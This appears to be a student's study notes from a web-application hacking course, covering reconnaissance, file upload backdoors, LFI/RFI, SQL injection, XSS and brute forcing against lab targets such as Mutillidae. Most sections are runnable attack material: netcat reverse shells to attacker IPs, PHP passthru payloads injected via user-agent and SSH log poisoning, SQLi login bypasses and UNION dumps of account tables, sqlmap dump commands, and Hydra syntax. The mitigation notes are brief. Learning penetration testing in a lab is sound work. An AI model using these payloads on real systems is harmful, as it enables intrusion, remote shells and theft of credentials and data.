Website Hacking

Information Gathering

  • IP Address

  • Domain name info

  • Technologies used

  • Other websites on the same server

  • DNS records

  • Unlisted files, sub-domains, directories

  1. Whois lookup - find info about owner of the target

  2. Netcraft Site Report - shows technologies used on the target

  3. Robtex DNS lookup - shows comprehensive info about the target website

Websites on the Same Server

  • One server can server a number of websites

  • Gaining access to one can help gain access to others

To find websites on the same server:

  1. Use robtex DNS lookup under “names pointing to the same IP”

  2. Using bing.com, search for ip:[target ip]

Discovering Subdomains

Knock can be used to find subdomains of target

  1. Discover more information

  2. Discover new web applications

  3. Increase attack surface

  4. Discover managemment areas

  5. Beta / experimental features

knockpy google.com

Files and Directories

  • Find files and directories in target webasite

  • a tool called dirb

    • dirb [target] [wordlist] [options]

Exploitation

File Upload Vulnerabilities

  • Simple type of vulnerabilities

  • llow users to upload dexecutable files such as php

Upload a php shell or backdoor, ex: weevly

  1. Generate backdoor: weevly generate [password] [filename]

  2. Upload generated file

  3. Connect to it: weevly [url to file] [password]

  4. Find out how to use weevly help

Code Execution Vulnerabilities

  • If theres a command execution box or something

  • Allows an attacker to execute OS commands

  • Windows or linux commands

  • Can be used to get a reverse shell

  • Or upoad any file using wget command

  • Code execution commands attached in the resources

# Listen on your machiine on port 8080
nc -vv -l -p 8080

# The ip address of your machine for reverse connection - this will connect from the remote machine to your machine
nc -e /bin/sh 10.20.14.203 8080

Local File Inclusion

  • If theres a URL like this: ?page=include.php

  • Allow an attacher read any file on the same server

  • Access files outside www directory

Shell from LFI

  • Try to inject code into readable files

  • Example:

    • /prod/self/environ

# with burp suite modify the user-agent with:
<?passthru("nc -e /bin/sh 10.20.14.208 8888");?>

* /var/log/auth.log
# encode this  with base64
ssh "<?passthru('nc -e /bin/sh 10.20.14.208 8888');?>"@10.20.14.210

# encode with burpsuite like this:
ssh "<?passthru(base64_decode('dkfhewkhohwkeff'));?>"@10.20.14.210

* /var/log/apache2/access.log

Remote File Inclusion

  • If theres a URL like this: ?page=include.php, put in /?page=http://10.20.14.203/reverse.txt

  • Similar to local file inclusion

  • But allows attacher to read any file from any server

  • Execute php files from other servers on the current server

  • Store php files on other servers as .txt

/etc/php5/cgi/php.ini
    allow_url_fopen = on
    allow_url_include = on
<?php

// save this as a txt file - it must be a webserver which kali has

passhru("nc -e /bin/sh 10.20.14.203 8080")

?>

Mitigation

  1. File Upload Vulns - only allow safe files to be uploaded

  2. Code Execution Vulns

    • Dont use dangerous functions

    • Filter use input before execution

  3. File inclusion

    • Disable allow_url_fopen and allow_url_include

    • Use static file inclusion

SQL Injection

  1. They are everywhere

  2. Give access to the database - sensitive data

  3. Can be used to read local files outside www root

  4. Can be used to log in as admin and further exploit system

  5. Can be used to upload files

Discovering SQLi in POST

# use a single quote when logging in to see the code
# use and 1=1
# and 1=0 to see if that works in the case of blind sql injection
# aNd 111=111
# OrDeR bY 1

# input your code like this in the password field:
123456' code here#
# bypass need for password in the  password field
aaa' or 1=1 #

# bypass need for password in the username field
admin' #
# You can do the same with URLs if the UL has ?page=user-info.php&username=caleb
# you can inject ?page=user-info.php&username=caleb' order by 1#
# union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'
# union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'
# union select 1,username,password,is_admin,5 from accounts
# union select null,load_file('/etc/passwd'),null,null,null
# union select null,'example  example',null,null,null into outfile '/var/www/mutillidae/example.txt'
# uNiOn/**/sElEcT/**/1,2/**/%23

Exploitation

  • SQLMap was designed to exploit sql injections

  • Works with many DB types, mysql, mssql, etc.

  • Can be used to perform everything we learned and more

sqlmap --help

# this is the full url including all the other stuff that comes after the url
sqlmap -u [target url]

# Get the dbs
sqlmap -u URL --dbs

# Current user, database, tables, columns, data
sqlmap -u URL --current-user
sqlmap -u URL --current-database
sqlmap -u URL --tables -D owasp10
sqlmap -u URL --columns -T accounts -D owasp10
sqlmap -u URL -T accounts -D owasp10 --dump

Preventing SQLi

  • Filters can be bypassed

  • Use black list of commands? Still can be bypassed

  • Use whitelist? Same issue

  • Use parameterized statments, seperate data from sql code

prepare("select * from accounts where username = ?")
execute  (array('$admin' union select #'))

XSS Vulnerabilities

  • Allow an attacker to inject javascript code into the page

  • Code is executed when the page loads

  • Code is executed on the client machine not the server

Three main types 1. Persistent/stored XSS 2. Reflected XSS 3. DOM based XSS

Discovering XSS

Reflected XSS

  • None persistent, not stored.

  • Only work if the target visits a specially crafted URL

  • http://target.com/page.php?something=<script>alert(“XSS”)</script>

  • <script>alert(“XSS”)</script>

Stored XSS

  • Persistent, stored on the page or DB

  • The injected code is executed every time the page is loaded

Exploiting XSS

  • Run any javascript code

  • Beef framework can be used to hook targets

  • Inject Beef hook in vulnerable pages

  • Execute code from beef

Preventing XSS Vulns

  • Minimise the usage of user input on html

  • Escape any untrusted input before inserting it into the page

Brute Force & Dictionary Attacks

  • Crunch can be used to create a wordlist

  • Syntax: crunch [min] [max] [characters] -t [pattern] -o [FileName]

  • example: crunch 6 8 123abc$ -i wordlist -t a@@@@b

Hydra

  • Hydra is a bruteforce tool that can be used to bruteforce almost any authentication service

  • Syntax: hydra [IP] -L [usernames] -P [passwords] [service]

  • Example: hydra 10.20.14.212 -l admin -P /root/wordlist.txt http-post-form “mutillidae/?paye=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:F=Not Logged In”

Discovering Vulnerabilities Automatically

Zed Attack Proxy ZAP

  • Automatically find vulnerabilities in web applications

  • free and easy to use

  • can also be used for manual testing

Pentest Methodology

  • Info Gathering

  • For every domain / subdomain

    • click on every link

      • for every link

        • test parameters